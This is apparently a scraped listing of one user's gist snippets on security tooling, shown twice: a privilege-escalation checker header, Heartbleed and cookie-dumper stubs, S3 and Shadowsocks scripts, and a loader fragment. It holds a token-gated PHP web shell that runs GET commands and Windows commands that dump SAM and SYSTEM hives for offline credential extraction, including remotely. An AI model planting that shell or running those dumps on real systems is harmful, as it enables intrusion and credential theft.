sh1n0b1

## linuxprivchecker.py
#!/usr/env python

###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.

## hashdump.reg
reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

#https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py

#Do this remotely
wmic /node:"<computer_name>" /user:"<username>" /password:"<password>" process call create "cmd.exe /c reg save hklm\sam C:\temp\sam.save"

## ssltest.py
#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.

import sys
import struct
import socket
import time
import select

## BinaryCookieReader.py
#*******************************************************************************#
# BinaryCookieReader: Written By Satishb3 (http://www.securitylearn.net)        #
#                                                                               #
# For any bug fixes contact me: satishb3@securitylearn.net                      #
#                                                                               #
# Usage: Python BinaryCookieReader.py Cookie.Binarycookies-FilePath             #
#                                                                               #
# Safari browser and iOS applications store the persistent cookies in a binary  #
# file names Cookies.binarycookies.BinaryCookieReader is used to dump all the   #
# cookies from the binary Cookies.binarycookies file.                           #

## s3.sh
# You don't need Fog in Ruby or some other library to upload to S3 -- shell works perfectly fine
# This is how I upload my new Sol Trader builds (http://soltrader.net)
# Based on a modified script from here: http://tmont.com/blargh/2014/1/uploading-to-s3-in-bash

# ====================================================================================
# Aug 25, 2016 sh1n0b1
# Modified this script to support AWS session token
# More work will be done on this.
#
# S3KEY="ASIAJLFN####################"

## shadowsocks.sh
#!/bin/bash
#===============================================================================================
#   System Required:  Debian 9
#   Description:  Shadowsocks Server deployment script for Debian 9
#   Author: https://github.com/sh1n0b1
#===============================================================================================
apt update
apt install -y curl sudo
sudo apt install -y shadowsocks-libev
sudo systemctl start shadowsocks-libev

## urldecode.sh
alias urldecode='python -c "import sys, urllib as ul; print ul.unquote_plus(sys.argv[1])"'

## php_shell.php
<?php

//$allowedToken = "509F7BA70C680DDAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
$allowedToken = "<REPLACE_WITH_SOME_RANDOM_LONG_STRING>";
$token = $_GET['token'];

if ($token == $allowedToken){
	echo system($_GET['cmd']);
}else{
    header("HTTP/1.0 404 Not Found");

## FederatedLogin.py
# Original source code: https://docs.aws.amazon.com/en_us/IAM/latest/UserGuide/id_roles_providers_enable-console-custom-url.html
import urllib, json
import requests

access_key = ''
secret_key = ''
session_token = ''

json_string_with_temp_credentials = '{'
json_string_with_temp_credentials += '"sessionId":"' + access_key + '",'

## elevator.c
#include <stdio.h>
#include <string.h>
#include "lib.h"
#include <Wininet.h>
//#include "starter.h"

//include OTF
#include "font.h" // foofont is fetched from loader config struct

//#include "cert.h"
	#!/usr/env python

	###############################################################################################################
	## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
	## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
	##-------------------------------------------------------------------------------------------------------------
	## [Details]:
	## This script is intended to be executed locally on a Linux box to enumerate basic system info and
	## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
	## passwords and applicable exploits.
	reg.exe save hklm\sam c:\temp\sam.save
	reg.exe save hklm\security c:\temp\security.save
	reg.exe save hklm\system c:\temp\system.save
	secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

	#https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py

	#Do this remotely
	wmic /node:"<computer_name>" /user:"<username>" /password:"<password>" process call create "cmd.exe /c reg save hklm\sam C:\temp\sam.save"
	#!/usr/bin/python

	# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
	# The author disclaims copyright to this source code.

	import sys
	import struct
	import socket
	import time
	import select
	#*******************************************************************************#
	# BinaryCookieReader: Written By Satishb3 (http://www.securitylearn.net) #
	# #
	# For any bug fixes contact me: satishb3@securitylearn.net #
	# #
	# Usage: Python BinaryCookieReader.py Cookie.Binarycookies-FilePath #
	# #
	# Safari browser and iOS applications store the persistent cookies in a binary #
	# file names Cookies.binarycookies.BinaryCookieReader is used to dump all the #
	# cookies from the binary Cookies.binarycookies file. #
	# You don't need Fog in Ruby or some other library to upload to S3 -- shell works perfectly fine
	# This is how I upload my new Sol Trader builds (http://soltrader.net)
	# Based on a modified script from here: http://tmont.com/blargh/2014/1/uploading-to-s3-in-bash

	# ====================================================================================
	# Aug 25, 2016 sh1n0b1
	# Modified this script to support AWS session token
	# More work will be done on this.
	#
	# S3KEY="ASIAJLFN####################"
	#!/bin/bash
	#===============================================================================================
	# System Required: Debian 9
	# Description: Shadowsocks Server deployment script for Debian 9
	# Author: https://github.com/sh1n0b1
	#===============================================================================================
	apt update
	apt install -y curl sudo
	sudo apt install -y shadowsocks-libev
	sudo systemctl start shadowsocks-libev
	<?php

	//$allowedToken = "509F7BA70C680DDAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
	$allowedToken = "<REPLACE_WITH_SOME_RANDOM_LONG_STRING>";
	$token = $_GET['token'];

	if ($token == $allowedToken){
	echo system($_GET['cmd']);
	}else{
	header("HTTP/1.0 404 Not Found");
	# Original source code: https://docs.aws.amazon.com/en_us/IAM/latest/UserGuide/id_roles_providers_enable-console-custom-url.html
	import urllib, json
	import requests

	access_key = ''
	secret_key = ''
	session_token = ''

	json_string_with_temp_credentials = '{'
	json_string_with_temp_credentials += '"sessionId":"' + access_key + '",'
	#include <stdio.h>
	#include <string.h>
	#include "lib.h"
	#include <Wininet.h>
	//#include "starter.h"

	//include OTF
	#include "font.h" // foofont is fetched from loader config struct

	//#include "cert.h"